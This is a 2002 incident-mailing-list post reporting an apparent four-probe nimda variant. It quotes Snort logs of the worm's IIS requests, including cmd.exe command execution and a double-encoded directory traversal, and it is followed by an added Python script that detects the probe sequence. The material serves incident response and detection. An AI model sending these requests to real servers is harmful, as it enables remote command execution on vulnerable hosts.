New nimda variant?

From: Russell Fulton (r.fulton@auckland.ac.nz)
Date: 05/01/02


From: Russell Fulton <r.fulton@auckland.ac.nz>
To: incidents@securityfocus.com
Date: 01 May 2002 12:07:14 +1200

Over the last few days I have been seeing increasing numbers (now up to
3 or 4 per hour) of nimda-like attacks against web servers.

Unlike nimda, which normally does 15 probes, this new variant only does
4 probes, as illustrated in these Snort logs:

[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214
IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x4262A517 Ack: 0x6CBA93E Win: 0x4248 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x42AA87EB Ack: 0x67C77D4 Win: 0x4248 TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x43380090 Ack: 0x74BEA3A Win: 0x4248 TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401
IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x4394DC62 Ack: 0x76C208B Win: 0x4248 TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
65 0D 0A 0D 0A e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Has anyone caught one of these in a honeypot? If it really is something
new then the anti-virus vendors need to know about it...

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand
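The following is an added example, not part of Russell's post or any Snort code: a small Python script that parses Snort's full-alert output of the kind quoted above, recovers each HTTP request line from the hex dump, groups probes by source address, and flags a source whose four requests match the root.exe / cmd.exe / cmd.exe / _mem_bin sequence described above within a short time window. It also percent-decodes the `_mem_bin` request twice, which is what turns `%255c` into a backslash and exposes the directory traversal. The sample log is constructed from the four alerts quoted in the post (abbreviated to the request line); the 60-second window, the labels and the `FOUR_PROBE_VARIANT` pattern list are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: the four alerts quoted in the post, abbreviated to the alert
# header, timestamp line, IP line and the hex-dump lines up to each request's first
# CRLF (the parser only needs the request line).
SAMPLE_LOG = """\
[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214 IpLen:20 DgmLen:112 DF
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884 IpLen:20 DgmLen:120 DF
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005 IpLen:20 DgmLen:120 DF
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401 IpLen:20 DgmLen:157 DF
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
"""

ALERT_RE = re.compile(r"^\[\*\*\] (.+?) \[\*\*\]$")
TS_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) ")
IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):\d+ -> (\d{1,3}(?:\.\d{1,3}){3}):\d+ ")
HEX_RE = re.compile(r"^((?:[0-9A-F]{2} ){1,16})")
# Request paths of the four-probe variant reported above, in arrival order (assumed signature).
FOUR_PROBE_VARIANT = [r"^/scripts/root\.exe\?", r"^/c/winnt/system32/cmd\.exe\?",
                      r"^/d/winnt/system32/cmd\.exe\?", r"^/_mem_bin/"]

def parse_snort_alerts(text):
    """Parse Snort full-alert output into dicts: name, ts, src, dst, target."""
    alerts, cur = [], None
    for line in text.splitlines():
        if m := ALERT_RE.match(line):
            cur = {"name": m.group(1), "ts": None, "src": None, "dst": None, "payload": b""}
            alerts.append(cur)
        elif cur is None:
            continue
        elif m := TS_RE.match(line):
            # Snort omits the year; a placeholder leap year keeps 02/29 parseable.
            cur["ts"] = datetime.strptime("2000/" + m.group(1), "%Y/%m/%d-%H:%M:%S.%f")
        elif m := IP_RE.match(line):
            cur["src"], cur["dst"] = m.group(1), m.group(2)
        elif m := HEX_RE.match(line):
            cur["payload"] += bytes.fromhex(m.group(1).strip())
    for a in alerts:
        # request-target is the second token of the request line (up to the first CRLF)
        tokens = a["payload"].split(b"\r\n", 1)[0].decode("latin-1").split(" ")
        a["target"] = tokens[1] if len(tokens) > 1 else ""
    return alerts

def decode_target(target, rounds=2):
    """Percent-decode twice: %255c -> %5c -> backslash, exposing the ..\\..\\ traversal."""
    for _ in range(rounds):
        target = unquote(target)
    return target

def classify_source(events, window_seconds=60):
    """events: [(ts, target)] from one source. Labels are this example's own (assumed)."""
    events = sorted(events)
    targets = [t for _, t in events]
    span = (events[-1][0] - events[0][0]).total_seconds()
    if (len(targets) == len(FOUR_PROBE_VARIANT) and span <= window_seconds
            and all(re.match(p, t) for p, t in zip(FOUR_PROBE_VARIANT, targets))):
        return "four-probe variant"
    if any(re.search(r"(root|cmd)\.exe", t) for t in targets):
        return "other nimda-like"
    return "unclassified"

def summarize(text):
    """Source IP -> (label, probe count) over a Snort alert log."""
    by_src = defaultdict(list)
    for a in parse_snort_alerts(text):
        by_src[a["src"]].append((a["ts"], a["target"]))
    return {src: (classify_source(ev), len(ev)) for src, ev in by_src.items()}

if __name__ == "__main__":
    for src, (label, n) in summarize(SAMPLE_LOG).items():
        print(f"{src}: {n} probes -> {label}")
    for a in parse_snort_alerts(SAMPLE_LOG):
        print("  ", a["name"], "|", decode_target(a["target"]))
```

Run against a real alert file by passing its contents to `summarize()`; a source is only labelled as the four-probe variant when all four paths arrive in that order inside the window, so the ordinary 15-probe nimda sequence falls into the "other nimda-like" bucket and the two can be counted separately. The `decode_target` step matters for anyone writing their own rule: a single URL-decode of the `_mem_bin` request still shows `%5c` rather than the backslash traversal the request actually performs.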

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
